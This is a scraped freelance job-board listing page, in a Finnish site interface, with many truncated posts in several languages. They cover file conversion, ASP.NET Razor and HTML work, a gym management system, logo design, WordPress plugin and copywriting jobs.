filterSingles :: Hypothesis -> Hypothesis filterSingles t = t .&. (((complement t) .&. 0x02AAAAAA) `shiftR` 1) filterDups :: Hypothesis -> Hypothesis filterDups t = (t .&. 0x02AAAAAA) `shiftR` 1 defaultHypothesis :: Hypothesis defaultHypothesis = 0x90015555 -- all nine alphabet elements are set mapAlphabet :: V.Vector Hypothesis mapAlphabet = V.replicate 256 defaultHypothesis V.// validDigits where validDigits :: [(Int, Hypothesis)] validDigits = [(ord i, (bit 28) .|. (bit $ 2*(ord i - 49))) | i <- "123456789"] toChar :: Hypothesis -> [Char] toChar s | single s = [normalize s] | otherwise = "." where normalize s = chr $ (+) 49 $ (firstBit s) `shiftR` 1 toCharDebug :: Hypothesis -> [Char] toCharDebug s | isSolution s = ['!', normalize s] | single s = [normalize s] | otherwise = "{" ++ digits ++ "}" where normalize s = chr $ (+) 49 $ (firstBit s) `shiftR` 1 digits = zipWith test "123456789" $ iterate (\e -> e `shiftR` 2) s test c e | e.&.1 == 1 = c | otherwise = '.' -- Initial hypothesis space initialize :: String -> Maybe HypothesesSpace initialize g = if all (`elem` "0.-123456789") g then let hints = zip [0..] translated translated = map (\c -> mapAlphabet V.! ord c) $ take ncells g in Just $ (V.replicate ncells defaultHypothesis) V.// hints else Nothing -- Display (partial) solution printResultD :: HypothesesSpace -> IO () printResultD = putStrLn . toString where toString :: HypothesesSpace -> String toString hyp = unlines $ map translate . chop 9 $ V.toList hyp where translate = concatMap (\s -> toCharDebug s ++ " ") printResult :: HypothesesSpace -> IO () printResult = putStrLn . toString where toString :: HypothesesSpace -> String toString hyp = translate (V.toList hyp) where translate = concatMap (\s -> toChar s ++ "") -- The entire solution process! solve :: String -> Maybe HypothesesSpace solve str = do initialize str >>= prune >>= search main :: IO () main = do [f] <- getArgs sudoku <- fmap lines $ readFile f -- "test.txt" mapM_ printResult $ mapMaybe solve sudoku 21 List comprehensions by Ben Lynn. Translated from my brute force solver in" 22 Add your own If you have a Sudoku solver you're proud of, put it here. This ought to be a good way of helping people learn some fun, intermediate-advanced techniques in Haskell. 23 get over 47,000 distict minimal puzzles from csse.uwa.edu that have only 17 clues. Then you can run all of them through your program to locate the most evil ones, and use them on your associates."
https://wiki.haskell.org/index.php?title=Sudoku&diff=45218&oldid=6667
CC-MAIN-2016-36
refinedweb
3,085
57.47
Hi Hi This is part of the code.This is part of the code.Originally Posted by MrFujin # Fish Game # By antiloquax import pygame, random from pygame.locals import * pygame.init() clock = pygame.time.Clock() screen = pygame.display.set_mode([600,400]) pygame.display.set_caption("Fish Game") music = pygame.mixer.Sound("tune.wav") music.play(-1) toy = pygame.mixer.Sound("toy.wav") burp = pygame.mixer.Sound("burp.wav") Here is where I get an error IDLE_tmp_0czq8u python 3.3.3(v3.3.3:c3896275c0f6 >>> >>> Traceback (most recent call last): File "C:\Python33\Fish Game.py" , line 13, in <module> music = pygame.mixer.Sound("tune.wav") pygame.error: Unable to open file 'tune.wav' >>> Thanks for all your help,but like I said I'm new to this.Thanks for all your help,but like I said I'm new to this.Originally Posted by Dietrich How to you put the sound wav file in the working folder or give it a full path.When I downloaded it,it was put in it's own folder and that folder is in python's 3.3 folder along with my program. How does python open the wav's folder.Thanks. This code sample might help ... Code:import os import pygame def load_sound(sound_filename, directory): """ load the sound file from the given directory return the sound object """ fullname = os.path.join(directory, sound_filename) sound = pygame.mixer.Sound(fullname) return sound pygame.init() screen = pygame.display.set_mode([600, 400]) pygame.display.set_caption("Play a Wave File") # pick a wave (.wav) sound file you have in the given directory directory = "C:/Windows/Media" chimes = load_sound("chimes.wav", directory) chimes.play() # event loop and exit conditions # use escape key or display window x click while True: for event in pygame.event.get(): if (event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE): pygame.quit() raise SystemExit Real Programmers always confuse Christmas and Halloween because Oct31 == Dec25 Thanks Dietrich I finally got it working.Like you said before the wav file has to be in the working directory.I finally figured out how to do it.Thanks again. Bob
http://forums.devshed.com/python-programming/955225-python-pygames-last-post.html
CC-MAIN-2015-06
refinedweb
356
63.66
NAME Perl::Critic::Theme - Construct thematic sets of policies. DESCRIPTION This is a helper class for evaluating theme expressions into sets of Policy objects. There are no user-serviceable parts here. INTERFACE SUPPORT This is considered to be a non-public class. Its interface is subject to change without notice. METHODS new( -rule => $rule_expression ) Returns a reference to a new Perl::Critic::Theme object. -rule. THEME RULES parentheses to enforce precedence as well. Supported operators are: Operator Altertative Example ---------------------------------------------------------------- && and 'pbp && core' || or 'pbp || (bugs && security)' ! not 'pbp && ! (portability || complexity) See "CONFIGURATION" in Perl::Critic for more information about customizing the themes for each Policy. SUBROUTINES cook_rule( $rule ) Standardize a rule into a almost executable Perl code. The "almost" comes from the fact that theme names are left as is. CONSTANTS $RULE_INVALID_CHARACTER_REGEX A regular expression that will return the first character in the matched expression that is not valid in a rule..
http://web-stage.metacpan.org/pod/Perl::Critic::Theme
CC-MAIN-2020-34
refinedweb
152
50.73
23 July 2010 17:33 [Source: ICIS news] TORONTO (ICIS news)--German business confidence marked its largest monthly increase in July since the country’s reunification in 1990, largely driven by improved export prospects, a research institute said on Friday. Munich-based Ifo institute said its monthly business climate index rose to 106.2 points in July, up by 5.6 points from June. The index is based on a survey of 7,000 businesses across ?xml:namespace> Ifo president Hans-Werner Sinn said the latest survey showed that producers were optimistic about export prospects. Also, industry capacity utilisation was increasing, he said. Manufacturers were especially upbeat, with many indicating they may boost staff levels, the survey found. The increase in the Ifo index contrasts with July’s decline in another key indicator that measures economic sentiment based on a survey of analysts. Mannheim-based ZEW centre for European economic research said earlier its economic sentiment index marked its third monthly decline in a row in July amid continued worries over the euro zone debt crisis. As for However, Frankfurt-based chemical trade group VCI has said it expected production to grow at a slower pace in the second half of 2010, partly due to lower growth in the EU, which is the largest export market for Full-year 2010 chemical production growth is forecast at 8.5%, after a 10% decline in 2009 from 2008. Meanwhile,
http://www.icis.com/Articles/2010/07/23/9379005/german-business-confidence-jumps-on-export-prospects-survey.html
CC-MAIN-2013-48
refinedweb
237
52.6
Problem: How to write the ternary operator in a lambda function? Example: Say, you’ve got the following example: def f(x): if x > 100: x = 1.1*x else: x = 1.05*x return x print(f(100)) # 105.0 The function f(x) takes one argument x and increases it by 10% if the argument is larger than 100. Otherwise, it increases it by 5%. In this article, you’ll learn how to convert this code snippet into a Python One-Liner by using the Ternary operator—so stay tuned! But first things first: we start with a short explanation of the ternary operator and the lambda function. If you already know these Python concepts very well, you can skip them and go right away to the solution. Short Recap: Ternary Operator. Short Recap:. Here’s a practical example where lambda functions are used to generate an incrementor function: Exercise: Add another parameter to the lambda function! Watch the video or read the article to learn about lambda functions in Python: Now, you know everything you need to know to shorten the above code snippet! Method: Using the Ternary Operator in a Lambda Function As it turns out, you can also use the ternary operator effectively: f = lambda x: 1.1*x if x>100 else 1.05*x print(f(100)) # 105.0 The result is the same. An intermediate to advanced Python coder will have no problem understanding the code and it’s much more concise. That’s why I’d prefer this way over the first one. Here’s a direct one-on-one comparison of both methods. Which one do you like most? Try it yourself: Exercise: Before you run the code, take a guess: what’s the output of this code puzzle?.
https://blog.finxter.com/python-ternary-lambda/
CC-MAIN-2022-21
refinedweb
299
66.84
Overview Atlassian SourceTree is a free Git and Mercurial client for Windows. Atlassian SourceTree is a free Git and Mercurial client for Mac. django-qsstats-magic: QuerySet statistics for Django The goal of django-qsstats is to be a microframework to make repetitive tasks such as generating aggregate statistics of querysets over time easier. It's probably overkill for the task at hand, but yay microframeworks! django-qsstats-magic is a refactoring of django-qsstats app with slightly changed API, simplified internals and faster time_series implementation. Requirements - python-dateutil > 1.4, < 2.0 - django 1.2+ License Liensed under a BSD-style license. Examples How many users signed up today? this month? this year? from django.contrib.auth.models import User import qsstats qs = User.objects.all() qss = qsstats.QuerySetStats(qs, 'date_joined') print '%s new accounts today.' % qss.this_day() print '%s new accounts this week.' % qss.this_week() print '%s new accounts this month.' % qss.this_month() print '%s new accounts this year.' % qss.this_year() print '%s new accounts until now.' % qss.until_now() This might print something like: 5 new accounts today. 11 new accounts this week. 27 new accounts this month. 377 new accounts this year. 409 new accounts until now. Aggregating time-series data suitable for graphing from django.contrib.auth.models import User import datetime, qsstats qs = User.objects.all() qss = qsstats.QuerySetStats(qs, 'date_joined') today = datetime.date.today() seven_days_ago = today - datetime.timedelta(days=7) time_series = qss.time_series(seven_days_ago, today) print 'New users in the last 7 days: %s' % [t[1] for t in time_series] This might print something like: New users in the last 7 days: [3, 10, 7, 4, 12, 9, 11] Please see qsstats/tests.py for similar usage examples. API The QuerySetStats object In order to provide maximum flexibility, the QuerySetStats object can be instantiated with as little or as much information as you like. All keword arguments are optional but DateFieldMissing and QuerySetMissing will be raised if you try to use QuerySetStats without providing enough information. - qs The queryset to operate on. Default: None - date_field The date field within the queryset to use. Default: None - aggregate The django aggregation instance. Can be set also set when instantiating or calling one of the methods. Default: Count('id') - operator The default operator to use for the pivot function. Can be also set when calling pivot. Default: 'lte' - today The date that will be considered as today date. If today param is None QuerySetStats' today will be datetime.date.today(). Default: None All of the documented methods take a standard set of keyword arguments that override any information already stored within the QuerySetStats object. These keyword arguments are date_field and aggregate. Once you have a QuerySetStats object instantiated, you can receive a single aggregate result by using the following methods: for_minute for_hour for_day for_week for_month for_year Positional arguments: dt, a datetime.datetime or datetime.date object to filter the queryset to this interval (minute, hour, day, week, month or year). this_minute this_hour this_day this_year Wrappers around for_<interval> that uses dateutil.relativedelta to provide aggregate information for this current interval. QuerySetStats also provides a method for returning aggregated time-series data which may be extremely using in plotting data: - time_series Positional arguments: start and end, each a datetime.date or datetime.datetime object used in marking the start and stop of the time series data. Keyword arguments: In addition to the standard date_field and aggregate keyword argument, time_series takes an optional interval keyword argument used to mark which interval to use while calculating aggregate data between start and end. This argument defaults to 'days' and can accept 'years', 'months', 'weeks', 'days', 'hours' or 'minutes'. It will raise InvalidInterval otherwise. This methods returns a list of tuples. The first item in each tuple is a datetime.datetime object for the current inverval. The second item is the result of the aggregate operation. For example: [(datetime.datetime(2010, 3, 28, 0, 0), 12), (datetime.datetime(2010, 3, 29, 0, 0), 0), ...] Formatting of date information is left as an exercise to the user and may vary depending on interval used. - until Provide aggregate information until a given date or time, filtering the queryset using lte. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since. Keyword arguments: date_field, aggregate. - until_now Aggregate information until now. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using lte). Keyword arguments: date_field, aggregate. - after Aggregate information after a given date or time, filtering the queryset using gte. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since. Keyword arguments: date_field, aggregate. - after_now Aggregate information after now. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using gte). Keyword arguments: date_field, aggregate. - pivot Used by since, after, and until_now but potentially useful if you would like to specify your own operator instead of the defaults. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using lte). Keyword arguments: operator, date_field, aggregate. Raises InvalidOperator if the operator provided is not one of 'lt', 'lte', gt or gte. Testing If you'd like to test django-qsstats-magic against your local configuration, add qsstats to your INSTALLED_APPS and run ./manage.py test qsstats. The test suite assumes that django.contrib.auth is installed. For testing against different python, DB and django versions install tox (pip install tox) and run 'tox' from the source checkout: $ tox Db user 'qsstats_test' with password 'qsstats_test' and a DB 'qsstats_test' should exist. Difference from django-qsstats - Faster time_series method using 1 sql query (currently works for MySQL and PostgreSQL, with a fallback to the old method for other DB backends). - Single aggregate parameter instead of aggregate_field and aggregate_class. Default value is always Count('id') and can't be specified in settings.py. QUERYSETSTATS_DEFAULT_OPERATOR option is also unsupported now. - Support for minute and hour aggregates. - start_date and end_date arguments are renamed to start and end because of 3. - Internals are changed. I don't know if original author (Matt Croydon) would like my changes so I renamed a project for now. If the changes will be merged then django-qsstats-magic will become obsolete.
https://bitbucket.org/kmike/django-qsstats-magic/
CC-MAIN-2017-30
refinedweb
1,055
53.07
After a long Beta testing process, Tik Manager v3 is finally released. Tik Manager is a lightweight multi-platform and multi-software project management system. It is designed for small-mid range teams and individuals. Tik Manager is completely free for both personal and commercial use. Some of the improvement in v3 are: - Single Executable Windows installer - Completely new settings menu with lots of options to customize - Re-designed Asset Library with 3ds Max and Houdini support - Transfer Central to transfer assets easily between softwares - Photoshop support - Mp4 conversion for all preview files - Lots of UI improvements - Tons of Bug fixes Check the complete version history Download 16 Comments To Whom It may concern: I attempted to install the TIK application multiple times on windows 10 pro but it didn’t begin the installation. Is there a support forum available to post error messages or questions? Thank you, -Chris Hi Chris, You may need to disable your virus software before installation. Some av softwares gives a false positive for it. This is related with the PyInstaller (the library which I use to turn python files to executables) If you write down your error messages I can help you further. You can join the facebook group as well for Q&A: This looks pretty good, thank you so much for the time and effort put into it. Is there any support for sequence-shot based workflow other than just naming your animation files with the shot names? Thank you Spiderman, Actually sequence-shot based workflow is a little bit complex for small teams and individuals since it needs more nested folders. I agree it is a more suitable approach for relatively bigger projects but what I try to do is keep things simple as possible and a tool that doesn’t need to be learned. However, I am searching to expand the usage as the way you suggested without compromising simplicity. I would like to hear the ideas about the subject. Would this work with Maya 2022 python 3 or do you need to use the python2 on startup? Looks great, many thanks. Hi. Latest version is python3 compatible. Test driving Tik going forward due to python2 issue on previous manager. Would it be possible in a future release have the ability to dock the manager? Great job, well done and thank you. I was considered a dockable version but to be honest dockable UIs generally causing me more trouble than the benefits. However, I will give it another thought. Thanks Hi there thanks for getting back. I’m sure it’s not an easy fix to make it dockable but I find that with so many panels that need to stay open during production even on a duel monitor, it’s just a nice and tidy feature to tuck it away but still have it operational. Ive used openPipeline for 15 years and then over to Pipeline2 but there is no further development going forward, so Tik Manager wins for me. Hello. I have just started getting an error on loading TM. Any ideas, it has been working well and cant see why it doesnt want to load from the shelf. Thanks for any help. from tik_manager import SmMaya reload(SmMaya) tik_sceneManager = SmMaya.MainUI(callback=”tik_sceneManager”) tik_sceneManager.show() # Error: NameError: file line 3: name ‘reload’ is not defined # Seems like the shelf button is not updated. Remove this line from button command: reload(SmMaya) And it should be ok. not working maya 2022 It is working on 2022 (and pre-released 2023 as well) Make sure you have the latest version. The shelves may need a recrate too. So better deletr the shelf and do a re-install.
https://www.ardakutlu.com/tik-manager-v3-released/
CC-MAIN-2022-21
refinedweb
618
62.58
#include <stdio.h> void* memmove(void* s, const void* ct, int n); Copies n characters from ct to s and returns s. s will not be corrupted if objects overlap. The memmove function returns s after moving n characters. #include <stdio.h> int main() { static char buf [] = "This is line 1 \n" "This is line 2 \n" "This is line 3 \n"; printf ("buf before = %s\n", buf); memmove (&buf [0], &buf [16], 32); printf ("buf after = %s\n", buf); return 0; } It will proiduce following result: buf before = This is line 1 This is line 2 This is line 3 buf after = This is line 2 This is line 3 This is line 3 Advertisement
http://www.tutorialspoint.com/ansi_c/c_memmove.htm
crawl-001
refinedweb
116
68.64
Gotham -- From Start to Heroku Stay connected In this article, we'll implement and deploy a Gotham full-stack web framework using the Tera template system, Webpack for a complete front-end asset management, a minimal VueJS and CoffeeScript web app and deploy to Heroku. Gotham is a Rust framework which is focused on safety, speed, concurrency and async everything. Webpack is a NodeJS website asset preprocessor and bundler which can let you use. Because there is a lot to unpack here, this article will cover a step-by-step guide to launch these features on Heroku and advise you on common issues that need to be considered. Installing the dependencies Before we worry about the server environment, we need to be able to run the server on our own system. You will need to install each of the following: Since the kind of installation you have to go through depends on your operating system, simply follow the steps provided in the links above for each item. Setting up the project First we generate a Rust project with cargo new mouse cd mouse We'll call this project mouse, as in Mighty Mouse. Next we'll use WebpackerCli to install the initial files for using Webpacker in our project. webpacker-cli init Next we'll edit our Cargo.toml to add the dependencies we need. Add the following to the end of it. [dependencies] gotham = "0.3.0" gotham_derive = "0.3.0" hyper = "0.12.13" mime = "0.3.12" lazy_static = "1.2" tera = "0.11" webpacker = "~0.3" [build-dependencies] webpacker = "~0.3" Now add the following to your build.rs file in the projects main directory. extern crate webpacker; fn main() { println!("Validating dependencies…"); assert!(webpacker::valid_project_dir()); println!("Compiling assets…"); let _ = webpacker::compile(); } Now whenever you run the cargo command to build your project, it will verify your dependencies, bundle and prepare your assets. This is very helpful when you deploy to Heroku as it will tell you which dependencies are missing. A working project The hello world example given on the main page for Gotham is as follows. Put this in your src/main.rs file. extern crate gotham; use gotham::state::State; const HELLO_WORLD: &'static str = "Hello World!"; pub fn say_hello(state: State) -> (State, &'static str) { (state, HELLO_WORLD) } pub fn main() { let addr = "127.0.0.1:7878"; println!("Listening for requests at http://{}", addr); gotham::start(addr, || Ok(say_hello)) } At this point you can run cargo run and use your browser to navigate to to see the hello world example. From here we're going to remove the const HELLO_WORLD line and the entire say_hello method. We'll add a method named index_page, add a method named router, and we'll update the last line of main method to use them. extern crate gotham; extern crate hyper; use gotham::state::State; use gotham::router::builder::{ build_simple_router, DefineSingleRoute, DrawRoutes }; use gotham::router::Router; use hyper::Method; pub fn index_page(state: State) -> (State, (mime::Mime, String)) { let rendered = "Hello World!".to_string(); (state, (mime::TEXT_HTML, rendered)) } pub fn router() -> Router { build_simple_router(|route| { route. request(vec![Method::GET, Method::HEAD], "/"). to(index_page); }) } pub fn main() { let addr = "127.0.0.1:7878"; println!("Listening for requests at http://{}", addr); gotham::start(addr, router()) } This changes introduce mime type support in the method which we now use a router to get to. The router is mapping any request to the root url / to the index_page method. For this project we'll follow Rails' outline for organizing the files for the site. Now to demonstrate how to serve static assets in Gotham. Create the following directory structure app/assets/stylesheets in the root of your project. Create a file in that last directory named application.css and give it some styles like so. div { margin: 0 12px 0 12px; } footer { margin-top: 40px; font-size: 6pt; } Towards the top of src/main.rs add use gotham::handler::assets::FileOptions; and inside the build_simple_router code block add the following route option after the one you currently have in there. route. get("style/*"). to_dir( FileOptions::new("app/assets/stylesheets"). with_cache_control("no-cache"). with_gzip(true). build(), ); This will route any requests that try to access the style/ path in the url to any file that's in app/assets/stylesheets. In our HTML code we'll link to this style directly. Before that though you can now try to load the url after you run cargo run and see the styles we've entered in. We're now ready to introduce HTML pages with the Tera templating system. Tera templating in Gotham Tera is a templating DSL for Rust which serializes Rust objects before processing the views. There's very little learning curve to using it as it is designed with common template tasks in mind. We'll rewrite the index_page method to now use Tera and include the stylesheet we've created. Also we'll create a core object to load all our templates from and provide it with a path for our views. In your src/main.rs file update it for the following. #[macro_use] extern crate lazy_static; extern crate tera; use tera::{Context, Tera}; lazy_static! { pub static ref TERA: Tera = Tera::new("app/views/**/*.tera"). map_err(|e| { eprintln!("Parsing error(s): {}", e); ::std::process::exit(1); }). unwrap(); } pub fn index_page(state: State) -> (State, (mime::Mime, String)) { let mut context = Context::new(); let styles = &["style/application.css"]; let sources: &[&'static str] = &[]; context.insert("application_styles", styles); context.insert("application_sources", sources); let rendered = TERA.render("landing_page/index.html.tera", &context).unwrap(); (state, (mime::TEXT_HTML, rendered)) } In the lazy_static! block we create the TERA object which will load all the views and templates into an internal hash like lookup system and by which we will use it to render views with given contexts. The context we provide a view will contain the objects the view are to be updated or generated with. Now we need to create our application template and our landing page for the above code to work. Create the file app/views/layouts/application.html.tera <!DOCTYPE html> <html lang="en"> <head> {% block head %}{% for style in application_styles -%} <link rel="stylesheet" href="{{ style }}" /> {% endfor %}{% for source in application_sources -%} <style scoped> p { font-size: 2em; text-align: center; } </style> Now delete both app/javascript/hello_vue.js and app/javascript/hello_coffee.coffee and create the file app/javascript/hello.coffee and place the following in it. import Vue from 'vue/dist/vue.esm' import App from '../app.vue' document.addEventListener('DOMContentLoaded', -> element = document.getElementById 'vue-app' if element? app = new Vue( el: element render: (h) -> h App ) # Vue.config.devtools = true ) In my experimentation the environment JavaScript detects it keeps reporting production regardless of changing local environment variables so if you'd like to use the VueJS Devtool addon for your browser you should uncomment the devtools line above while you work. Now that we have the code to test we need only to include it in our site. Let's change our styles and sources values in the index_page method in src/main.rs to the following: let sources = &[ &asset_source("application.js"), &javascript_pack_tag("hello") ]; let styles = &[ "style/application.css", &stylesheet_pack_tag("hello") ]; We're including both the script and style for our VueJS code by using our _pack method helpers for the hello.coffee file. Now add the following to app/views/landing_page/index.html.tera within the content block. <div id="vue-app"></div> And now you have a working VueJS & CoffeeScript app when you run cargo run and view . Deploying to Heroku To deploy to Heroku you will need to use three separate buildpacks together for NodeJS, Ruby, and Rust. First let's initialize Heroku in our project. Use the Heroku Cli tool: heroku create heroku buildpacks:add heroku/nodejs heroku buildpacks:add heroku/ruby heroku buildpacks:add emk/rust It's very important to include Rust as the last buildpack. Before we can deploy we need to change the way our program hosts it's IP and PORT. Open the src/main.rs file and change the main method to the following. use std::env; pub fn main() { let port = env::var("PORT").expect("PORT env not found!"); let addr = format!("0.0.0.0:{}", port); println!("Listening for requests at {}", addr); gotham::start(addr, router()) } The application won't work on Heroku without binding to both the address 0.0.0.0 and the port number defined by the environment variable. Now to test it locally you have to assign a port number so the command in bash would look like PORT=7878 cargo run. Next we have to let Heroku know what command to run to run the application. Open up a file name Procfile and place the following. web: target/release/mouse The last part is of course the name of the application which we gave it; mouse. Now you need only to commit the source code with git and upload it to heroku. Be sure your .gitignorefile has lines for node_modulesand tmpas you don't want to upload those. git add . git commit -m "Heroku ready" git push heroku master After time enough to brew coffee you can now open the deployed website with the command heroku open. And viola! You've achieved implementing and deploying a fullstack Gotham app. As your application grows it will help to organize similar source code categories together in their own separate files (such as moving routing to src/route.rs). Summary This how-to should save you tons of time figuring out how to get a fullstack Gotham app ready. You can view the source code for this example here on Github. What you have here is a quicker way to get up and going with a very fast and capable website. Fast being what Rust and Gotham bring to the table and capable being what Webpacker and the entire JavaScript ecosystem bring with it. When you use Rust for your website you get the best performance you can in delivery. Any slowness experienced will be from other factors like unoptimized database queries or network latency. It's exciting to be working with both powerful and performant technologies when delivering content. Enjoy! Additional resources Read why [SaaS CI/CD solutions][14]can be right for open source projects Use CodeShip Pro and Traefik for development Learn how Ruby on Rails can optimize CI testing Stay up to date We'll never share your email address and you can opt out at any time, we promise.
https://www.cloudbees.com/blog/gotham-from-start-to-heroku
CC-MAIN-2022-40
refinedweb
1,756
66.23
One material type to another [SOLVED] On 07/07/2016 at 15:12, xxxxxxxx wrote: Here I have a somewhat basic script that takes all materials and creates c4d materials based on their names. What I really want to do is actaully create and replace all the scene with c4d ones. Useful for situations where I find myself needing to convert other render engine materials to basic ones for export. I of course get the creating part, how can I do the conversion? As it stands I run this script and then have to do alt dragging to manually replace my original materials. import c4d from c4d import gui def main() : mats = doc.GetMaterials(); for mat in mats: new_mat = c4d.BaseMaterial(c4d.Mmaterial); # create standard material new_mat[c4d.ID_BASELIST_NAME] = mat.GetName() +"_c4d"; doc.InsertMaterial(new_mat,pred=None,checknames=True) c4d.EventAdd(); if __name__=='__main__': main() On 08/07/2016 at 01:19, xxxxxxxx wrote: Hello, in Cinema 4D materials are assigned to objects using a Texture Tag. This texture tag is assigned to the object and references the used material through a BaseLink parameter. So you have to change this BaseLink on the texture tag. The easiest way to change the BaseLinks is to use BaseList2D.TransferGoal() on the original material with the new material as an argument. This function changes all BaseLinks referencing the given original material. Best wishes, Sebastian On 09/07/2016 at 12:29, xxxxxxxx wrote: That works like a dream. Thanks.
https://plugincafe.maxon.net/topic/9582/12864_one-material-type-to-another-solved
CC-MAIN-2019-22
refinedweb
246
57.47
Andrea Crotti wrote: > On 02/10/2012 03:27 PM, Peter Otten wrote: >> The package a will be either a.c/a/ or a.b/a/ depending on whether >> a.c/ or a.b/ appears first in sys.path. If it's a.c/a, that does not >> contain a c submodule or subpackage. > > > I would agree if I didn't have this declaration > __import__('pkg_resources').declare_namespace(__name__) > in each subdirectory. Sorry, you didn't mention that in the post I responded to and I didn't follow the thread closely. I found a description for declare_namespace() at but the text explaining the function is completely unintelligible to me, so I cannot contribute anything helpful here :(
https://mail.python.org/pipermail/python-list/2012-February/619673.html
CC-MAIN-2019-51
refinedweb
116
62.54
The random access files as name suggest, you can access the content of file from anywhere. The access here means read or write. That means you don't have to depend upon writing in a blank file or appending at the end of file only. The Random Access Files are the files in which you don't remain depending upon the content access at the beggening of the file or appending at the end of the file. There is a file pointer which can be positioned anywhere and you can do the file operation at that position of the file. The Java core IO package, java.io provides the RandomAccessFile class which supports this functionality. Using this class is not different from using other byte or character class for the file IO. This is simple operation with only one additional step, that step is optional, but necessary in case you want to do some random access functionality. The process is of pointer management. You don't need to worry, this is not the 'C' or 'C++' pointer we are talking about. This is the file position pointer. This is the pointer which tells the current access location of the file to the program. When you open the file initially this is at position 0. You can manage the pointer location using the method provided with the RandomAccessFile class, seek(long position); now this has a return type void and it advances the pointer to the position we pass as an argument. this is a long type argument because the file could be large in size. The following program will enlighten the use of RandomAccessFile class, for the demonstration purpose we are using a file with name inputfile.txt in which we have added following four lines. line one in input file. line two in input file. line three in input file. last line in input file. So now let us look at the program. import java.io.*; class RA{ public static void main(String[] args) throws IOException{ RandomAccessFile ras = null; try{ ras = new RandomAccessFile("inputfile.txt","r"); System.out.println(ras.getFilePointer()); System.out.println(ras.readLine()); ras.seek(20); System.out.println(ras.getFilePointer()); System.out.println(ras.readLine()); System.out.println(ras.getFilePointer()); } catch(Exception ioe){ System.out.println(ioe); } finally{ if(ras!=null) ras.close(); } } } In the program first of all we have created an object of RandomAccessFile which takes as parameter the file path(these is another constructor which takes the File object as parameter) and the operation type for the file. Here we are reading from file so using only "r", but if you want to open the file for read-write operation you should use the "rw" operation type. Next we print out the position of the file pointer using the method, getFilePointer(), this will return the current location of the file pointer. So we read the line, and after reading we are moving the pointer to the position 20 using the seek() method. again we have repeated the the operation. Here we have used the readLine() method to read the whole line, but there are other method in RandomAccessFile like readInt(), readDouble(), readChar() etc. You can use whichever suits your requirement. The output of the program is as follows: 0 line one in input file. 20 le. 24 As we told you the initial position of the pointer is 0, it prints 0 and read the line at position. After that we move the pointer to position 20 we read again, and it will print the le. as the position 20 is the second line "line two in input fi*le." marked by the *. Note: please remember that what we pass in the seek() method is actually the offset which is added to the current position on the file pointer, its not from the initial location of the pointer, that is 0. So this way we read the line and again check the position of pointer which is now 24. You see, this way we can access the file randomly to the position where we want. The possible use of this class and operation is to do file operation to any randomly selected part of file or to mark any bookmark on any file.
http://www.examsmyantra.com/article/61/java/random-access-files-in-java
CC-MAIN-2019-09
refinedweb
711
63.8
Convert classic asp razor työt need to convert it into project libre we have 360 degree photos and we need to convert that into 3d models. I need a format converter to convert a file with cookies to another format cookies. It's very easy to do it. Anyone can apply if you have coding skills. I have hundreds PDFs that I need converted to word , if you can complete the attached file in less than 2 days with maximum perfection, then more project can come you way. This is an urgent task, please bid if you are serious.. For the first part of the project, I need a one page website created with ASP.NET MVC Razor Syntax with HTML, CSS, Javascript. I have included a snapshot of how the page should appear. It should be a web application accessible from an Iphone' s Safari Web Browser with a quote form based on QMS desktop page that is shown on the attachment. the pdf file has 1 page (one section repeated 3 times in the same page). need to convert it to html (inline style only, no bootstrap, no css) simple html hello i am looking for someone to create an realist and animation pictures of my cats , into a 5 page story of there daily life or by theme i'm looking for about 5-10 pictures to convert into my online story i am making Convert our gallery creation software into an automated script or program that will run when the user logs in. Details and examples are included in the attached items. $320 Necesito armar un sistema de gestion de gimnasios con gestion de cuotas, venta de productos de hidratacion e indumentaria y gestion de caja con Multi usuario. Tipos de usuarios: Administrador Dueño GYM Cajeros Personas Al decir multiGimnasio quiero decir que necesito que yo como administrador pueda crear Gimnasios ilimitados y luego asignarlos a los dueños para que ellos creen caj.... [kirjaudu nähdäksesi URL:n] I am in need of someone that can take this [kirjaudu nähdäksesi URL:n] ) ... I have a client who needs to convert psd to html in angular application. Needs to be done asap. Serious bidder only can contact..... Hi, I am starting my own Jewellery online business and I am looking for someone to help me to create a high-quality modern but still classic logo. Let me know if you are able to do this and I will provide you with more information. Company name: KJK & Co I have taken some inspiration for this in the files below. Thank you, J Looking for Marketting /Sales executive with experience in ecommerce domain, able to generate leads and convert them (B2B). We have a website in wordpress. You have to generate plain HTML website. You have to follow web standards. Ping me for more details. I need a front end developer who can convert the PSD to responsive HTML design. We are a social enterprise based in US, focused on improving rural incomes by providing financed and warrantied productive-use solar equipment. [kirjaudu nähdäksesi URL:n] We would like to improve the speed of our website and convert to https exclusively. We will use [kirjaudu nähdäksesi URL:n] to calculate before and after score. We are expecting a 2x-4x reduction in loading ... ***PLEASE BID YOUR REAL BID, I WILL NOT NEGOTIATE*** I need a Wordpress plugin that : 1) Creates 3 shortcodes A) One for student info menu that allows for input of student - i) name a) Chinese surname (Chinese) b) Chinese surname (PinYin) c) Chinese given name (Chinese) d) Chinese given name (PinYin) e) English given name ii) school na.... Have a project VS 2015, AngularJS, ASP.NET MVC, C#, Razor,... Need support, working on issues, new functionality. Will not be able to share code base. We'll have to work in Q/A mode. Let's chat if interested. Hello, looking for copywriter with experience in World of Warcraft (BFA/Classic). Need x10 text 500-600 symbols right now (will need much more in the future). requirements: 1. native english 2. experience in wow 3. experience in writing seo-texts Price negotiable Hi, I would like to hire a programmer that can convert existing Joomla Template to have the following features : 1. Autofit on all desktop size 2. Sample website that are autofit are as the following link [kirjaudu nähdäksesi URL:n] Autofit means when view using desktop pc, it will show only single page and will not able to scroll. Link of the existing Joomla Website that need classic + Informative + Crisp + Mobile Friendly + SEO Friendly Website for My Business. I have decided Theming + Basic Wireframes + Content for my Website. Looking for Quick and Expert developer who can deliver 15 Pages site within in 15 Working Days. I need help to convert a H5 code to Cocos framework. You will need to know how to run the resulting code on Wechat mini game platform. Some modification on the source code is needed. Pls ping me to discuss. I need some help with finding some potencial client for a Men clothes store. import sys import base64 import requests import json # put desired file path here file_path = '[kirjaudu nähdäksesi URL:n]' image_uri = "data:image/jpg;base64," + [kirjaudu nähdäksesi URL:n](open(file_path, "rb").read()).decode() r = [kirjaudu nähdäksesi URL:n]("[kirjaudu nähdäksesi 